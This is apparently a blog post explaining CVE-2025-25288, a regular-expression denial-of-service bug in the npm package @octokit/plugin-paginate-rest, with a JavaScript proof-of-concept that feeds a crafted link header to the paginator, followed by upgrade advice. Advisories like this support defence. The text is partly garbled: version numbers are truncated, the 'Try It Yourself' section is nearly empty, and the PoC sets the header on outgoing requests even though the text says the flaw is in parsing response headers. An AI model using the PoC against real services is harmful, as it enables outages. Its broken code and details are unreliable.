CVE-2025-25288 - ReDoS Vulnerability in @octokit/plugin-paginate-rest – Explained With Exploit and Patch

@octokit/plugin-paginate-rest is a popular npm package that adds pagination support to GitHub’s Octokit REST client. If you’ve used GitHub’s API for anything from automation to building devtools, there’s a good chance you’ve relied on this library.

But did you know that, until version 11.4.1, it had a serious vulnerability? This post takes you through what went wrong, how to trigger it, and how to protect your project.

What is CVE-2025-25288?

CVE-2025-25288 is a security vulnerability in all major versions (from 1.. up to but not including 11.4.1) of @octokit/plugin-paginate-rest. The bug allows attackers to trigger a Regular Expression Denial of Service (ReDoS) through malicious manipulation of the link header in API requests.

In plain English:
If someone passes a specially-crafted link header via a custom Octokit instance, they can make your application hang or even crash. This is possible by exploiting how the plugin parses link headers for paginating API responses.

You’re at risk if you

- Use @octokit/plugin-paginate-rest lower than v11.4.1

Use pagination features via octokit.paginate.iterator() (or related methods)

- Allow untrusted/malicious users to feed custom headers into Octokit

How Does the Exploit Work?

When octokit.paginate.iterator() processes API responses, it parses the link header to find “next” or “prev” URLs for pagination. The bug: The parsing regex can take exponential time with certain patterns—a classic ReDoS scenario.

Here’s what a simple exploit looks like

const { Octokit } = require("@octokit/core");
const { paginateRest } = require("@octokit/plugin-paginate-rest");

const MyOctokit = Octokit.plugin(paginateRest);

const evilLink =
  ' ' + 'a'.repeat(10000) + '<https://api.github.com/resource?page=2>;; rel="next"';

const octokit = new MyOctokit({
  request: {
    // Maliciously long and crafted link header to trigger ReDoS
    headers: {
      link: evilLink,
    }
  }
});

// This call will hang or crash
(async () => {
  for await (const response of octokit.paginate.iterator("GET /users")) {
    // Process the response...
    break; // for demo
  }
})();

What happens here?
The crafted link header gets processed by the vulnerable regex. Because of its pathological construction, parsing it takes ages—effectively making your server freeze (DoS).

Proof of Concept (PoC): Try It Yourself

Warning: Only test in a safe, local environment!

`

npm install @octokit/plugin-paginate-rest@11.4. @octokit/core

How Do You Fix It?

Upgrade your dependency!
@octokit/plugin-paginate-rest version 11.4.1 fixes this problem. The fix adjusts the regex parsing logic to avoid ReDoS conditions.

npm install @octokit/plugin-paginate-rest@latest

Alternatively:
Do not pass untrusted headers (especially link) into your Octokit client.

Links and References

- GitHub Security Advisory
- npm package page
- Official Patch Commit (GitHub)
- OWASP: Regular expression Denial of Service – ReDoS

Recommendations

- Upgrade immediately to @octokit/plugin-paginate-rest@11.4.1 or newer.

Follow safe header and input handling practices.

Stay safe and keep dependencies up to date! Vulnerabilities like CVE-2025-25288 are a common threat, but easy to prevent with prompt upgrades and a little vigilance.


*If you have any questions or spot signs of exploitation, check the official advisories or post on GitHub Discussions for the Octokit project.*

Timeline

Published on: 02/14/2025 20:15:34 UTC